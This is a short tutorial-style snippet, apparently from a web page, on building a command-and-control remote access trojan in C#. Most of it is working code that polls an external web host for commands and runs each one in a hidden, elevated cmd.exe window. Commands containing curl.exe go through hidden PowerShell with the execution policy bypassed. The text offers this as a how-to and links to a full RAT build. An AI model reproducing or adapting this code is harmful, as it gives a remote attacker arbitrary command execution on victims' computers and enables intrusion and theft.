NOTE: To undersatnd full command and control RAT from scratch click here
This will get the command from online web server.
new WebClient().DownloadString("https://ustaad-mailer.000webhostapp.com/go.php");<br>
Run command in device.
Process cmd = new Process();<br>
cmd.StartInfo.FileName = "cmd.exe";<br>
cmd.StartInfo.RedirectStandardInput = true;<br>
cmd.StartInfo.RedirectStandardOutput = true;<br>
cmd.StartInfo.CreateNoWindow = true;<br>
cmd.StartInfo.UseShellExecute = false;<br>
cmd.StartInfo.Verb = "runas";<br>
cmd.Start();<br>
cmd.StandardInput.WriteLine(json);<br>
<br><br><br>
Lets wait for 1 second
Thread.Sleep(1000);
Now lets combine the whole idea. Get the command and run cmd in while loop
while (chk == 0)
{
try
{
json = new WebClient().DownloadString("https://ustaad-mailer.000webhostapp.com/go.php");
if (json != oldjson)
{
if (json.Contains("curl.exe"))
{
System.Diagnostics.Process.Start("CMD.exe", "/C powershell -w h -ep bypass " + json);
}
else
{
Process cmd = new Process();
cmd.StartInfo.FileName = "cmd.exe";
cmd.StartInfo.RedirectStandardInput = true;
cmd.StartInfo.RedirectStandardOutput = true;
cmd.StartInfo.CreateNoWindow = true;
cmd.StartInfo.UseShellExecute = false;
cmd.StartInfo.Verb = "runas";
cmd.Start();
cmd.StandardInput.WriteLine(json);
}
Console.WriteLine("diff result json=" + json + "old=" + oldjson);
}
else
{
Console.WriteLine("same result json=" + json + "old=" + oldjson);
}
oldjson = json;
}
catch (Exception e)
{
Console.WriteLine("Connection not stable.");
}
Thread.Sleep(1000);
}